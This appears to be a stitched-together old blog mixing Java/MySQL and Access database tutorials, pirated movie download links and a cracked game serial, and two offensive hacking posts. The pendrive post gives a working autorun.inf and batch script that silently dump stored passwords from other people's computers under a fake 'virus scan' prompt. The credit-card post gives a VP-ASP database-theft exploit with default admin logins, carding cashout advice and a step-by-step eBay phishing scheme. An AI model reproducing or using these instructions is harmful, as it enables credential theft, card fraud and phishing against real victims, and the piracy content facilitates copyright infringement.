17:34

Setting up a Visual Java Address Book Program Which Accesses A MySQL Database


Click here for a for the source code to MyAddressSQL.java or here to view the source in a web page.
  1. Goto mysql.org and under downloads install the mycommunity mysql server
And download mySQL database server 6.0. After install goto to mysql in your programs and configure the server program. Install a path to mysql in windows.
  1. Goto downloads and download and install MySQL Connector/ODBC 3.51 Downloads which is the windows msi file 3.51.25 .
  2. Goto mysql.org and download and install the mysql connector/j
...may be necessary to add mysql-connector-java-3.1.14-bin.jar to the MySQL directory in Program files and to add a reference to this directory and this file in CLASSPATH in System>Advanced>Environment Variables of the control panel
To Run MySql first navigate to the MySQL commandline Client as shown below and click it.
MySQL CommandLine Client
If your password was setup to be student type student under enter the password.
Enter Password
Create the myaddress4 database as follows (use the password student if you have it set to this).
Enter password: *******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.22-community-nt
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+----------+
| Database |
+----------+
| mysql |
| test |
+----------+
2 rows in set (0.08 sec)
mysql> drop DATABASE IF EXISTS myaddressbook4;
mysql> create database myaddressbook4;
Query OK, 1 row affected (0.01 sec)
mysql> show databases;
+----------------+
| Database |
+----------------+
| myaddressbook4 |
| mysql |
| test |
+----------------+
3 rows in set (0.00 sec)
mysql> use myaddressbook4;
Database changed
mysql> create table phonelistTable(id INT NOT NULL AUTO_INCREMENT, PRIMARY KEY(id), Last VARCHAR(255), First VARCHAR(255), Phone VARCHAR(255));
Query OK, 0 rows affected (0.17 sec)
mysql> insert into phonelistTable(Last,First,Phone) values ('Krumm','Jim','123-4567');
Query OK, 1 row affected (0.05 sec)
mysql> insert into phonelistTable(Last,First,Phone) values ('Powers','Austin','444-4567');
Query OK, 1 row affected (0.01 sec)
mysql> insert into phonelistTable(Last,First,Phone) values ('Slick','Tom','555-4567');
Query OK, 1 row affected (0.02 sec)
mysql> insert into phonelistTable(Last,First,Phone) values ('Timberlake','Justin
','555-4567');
Query OK, 1 row affected (0.03 sec)
mysql> show tables;
+--------------------------+
| Tables_in_myaddressbook4 |
+--------------------------+
| phonelisttable |
+--------------------------+
1 row in set (0.00 sec)
mysql> select * from phonelistTable;
+------------+--------+----------+
mysql> select * from phonelistTable;
+----+------------+---------+----------+
| id | Last | First | Phone |
+----+------------+---------+----------+
| 1 | Krumm | Jim | 123-4567 |
| 2 | Powers | Austin | 444-4567 |
| 3 | Slick | Tom | 555-4567 |
| 4 | Timberlake | Justin | 555-4567 |
+----+------------+---------+----------+
4 rows in set (0.00 sec)4 rows in set (0.03 sec)
mysql>exit

Next make a connection for phonelistTable by first running odbcad32.exe. (This program is in your windows directory, when you find it send the shortcut to your desktop.) Select the System Tab as shown and click add.
ODBC Data Source Administrator
Next Select the MySQL ODBC 3.51 Driver as shown below.
Create New Data Source
Set up the following MySQL window as follows (set user to root and password to student and test the connection) and click OK.
MySQL Connector/ODBC
Now that the database is configured, as shown in the following window, click OK.
ODBC Data Source Administrator
3: Make a new Java project in eclipse or your favorite Java IDE and click here to view the code to AddressBookMySql in a web page or click here to download the source file.
4. Below is a screen shot of the program running.
MySQL Database Java Application

17:32

A Java Program Which Makes System Calls to Execute Programs from DOS


The following program will call a Console or DOS program written in the Windows XP environment. To get this program to work put a program called helloworld.exe perhaps compiled in C++ in the same directory as myclass.java. Click here for a copy of a program helloword.exe made in C++ to put in the directory with the file myclass.java.
import java.io.IOException;
class myclass
{
          public static void main(String[] args) throws IOException, InterruptedException
          {
                    Process p = Runtime.getRuntime().exec("cmd /c start /MIN helloworld.exe");
                    p.waitFor();
          }
}

How to Create a Java Visual Application that Links to an Access 2008 Database in Windows XP and Java:  The Address Book Project 
The following shows how to create an Access 2008 database controlled by a visual Java Application. To get a copy of the source code and the databases created using Access 2008 and Access 2003 format click here. To view the source code click here: copy of the source AddressBookDataBase.java.

Database program

Snapshot of the finished program

A.  Make the Database
Open Access (Access 2008 in this tutorial, but it is similar to Access 2003) and create a database called Address in your root directory on your C: drive. Save this database to your root directory. I do not advise normally doing this on a routine basis.   To do this you will first have to go the top left corner of Access and click on the colored circle with the 4 squares on it to trigger the new option in the menu as shown below:
Access Program,
Click on the browse Button As shown below:
Browse Button in Access
Navigate to your root directory as shown below and save the file as Address.accdb (if you have Access 2008) or Address.mdb (if you have Access 2003).
Saving the Address database
In the first column, right click at the very top of the column (where it says add a new field) and select rename column and rename this column Last (for last name). Leave the ID column alone. If you are using Access 2003 you won't see an ID column and when you finish, the last thing you will be asked is if you wish a numerical key to be created, say yes.
Renaming Columns in Access
Do not rename the ID column. Rename the next column First and the next Phone.  If you make any mistakes you probably will want to start over. It is often easier to recreate the database and make it perfect than it is to change the code. Enter some initial data in the table which could look as follows:
Finished Database
Next go to file > save > and name your table AddressTable.
Name Table
At this point your database file is saved.  At this point your database should look as follows:
Finished Database
Exit your database.
B.  Make the Connection
Close Microsoft Access (a connection cannot be established with Access running). Locate the odbcad32.exe using windows explorer found in your c:\windows\system32 directory and double click on it.  The ODBC Data Source Administrator program will open. Click the System tab. Click the Add Button. 
ODBC
A “Create New Data Source” window will open, select Microsoft Access Driver (*.mdb, accdb) from the list and click finish: 
Create New Data Source
In the ODBC Microsoft Access Setup window that appears next, type myAddressBook in the field for Data Source Name and click the Select Button. 
ODBC Data Source Name
In the Select Database window that opens navigate to and select Address.accdb (if you are in Access 2008) or Address.mdb if you are using Access 2003 and click OK. 
Select Address accdb in ODBC
Then click OK in the ODBC Microsoft Access Setup window.  Finally click OK in the Microsoft ODBC Data Source Administrator Window. 
Finalize ODBC with OK
This completes making the connection. Close Microsoft ODBC.  
C.  Make the program
Start Eclipse or TextPad (or some other java text editor).    Start a new java application project/program called AddressBookDataBase which looks as follows.  The following program actually works, you can simply copy and paste it as source.  You can also click here for a copy of the source AddressBookDataBase.java.  A couple words of caution:  Before coding close Access.  Also, this code is not easily adaptable to an applet.  Applications have more permissions to write and save to file than do applets.  It is however possible to convert this program if you know what you are doing by adjusting your computer's file permissions using the Java policy editor.

09:17

SMS (2012)(Audio Cleaned) - PDVDRip - 1CD









Credits TO XDM

For Getting High Speed Download speeed Pls Purchase Premium From this Link And Support me By Providing More Quality Releases
Code:
http://ul.to/01hge7ta
Single Link
Code:
http://extabit.com/file/27b5bks9wzvos

http://fooget.com/0i8nemwus8dt.html

http://filevelocity.com/iel79czm9a7f/Sms.PDVD.1CD.mkv
200mb Splited
Code:
http://extabit.com/file/27b5bks9wzsks
http://extabit.com/file/27b5bks9wzpgc
http://extabit.com/file/27b5bks9wzpfw
http://extabit.com/file/27b5bks9wzyzw
Code:
http://filevelocity.com/cx8v6onm6157/Sms.PDVD.1CD.mkv.003
http://filevelocity.com/jpg4lqmcsypq/Sms.PDVD.1CD.mkv.002
http://filevelocity.com/cihcrhmffefa/Sms.PDVD.1CD.mkv.001
http://filevelocity.com/flgdo0vk7evz/Sms.PDVD.1CD.mkv.004

09:14

Angry Birds Seasons-The Year Of Dragon (2012) | 53 MB




Quote:
1.Just unrar it
2.install it use the serial to get full version enjoy !!
Use This serial key- THET-ALEV-LEFR-USWO 

DOWNLOAD Code:
http://depositfiles.com/files/65tori21e

08:42

NiRvIghna-2K12

A National level Symposium on 03th March 2012


REGISTRATION:-
















POSTER:-
INVITATION:-



















































CONTACT:-
FACEBOOK click HERE
OUR'S SITE click HERE

16:45

HACKING PASSWORDS USING PENDRIVE


Learn how to steal information or passwords of
your friends using pendrives...





Today I will show you how to hack Passwords using USB Pen Drive. As You know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, Windows messenger and many more .Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.


First You have to download the following thing needed to create a rootkit.





>>>> CLICK ON BLUE COLOURED LETTERS BELOW TO DOWNLOAD




1) MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

2) Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


3) IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0


4) Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…


5) PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



NOTE: You must temporarily disable your antivirus before following these steps.


Now Follow The following Steps

1. Download all the 5 tools, extract them and copy only the executables(.exe files)into your USB Pendrive.

ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you'll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.


AND DONOT HESITATE TO COMMENT IF U HAVE ANY

PROBLEM ABOUT THIS HACK

08:14

How to Hack a Credit Card


Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards andbank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).


This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machinescashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use :eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.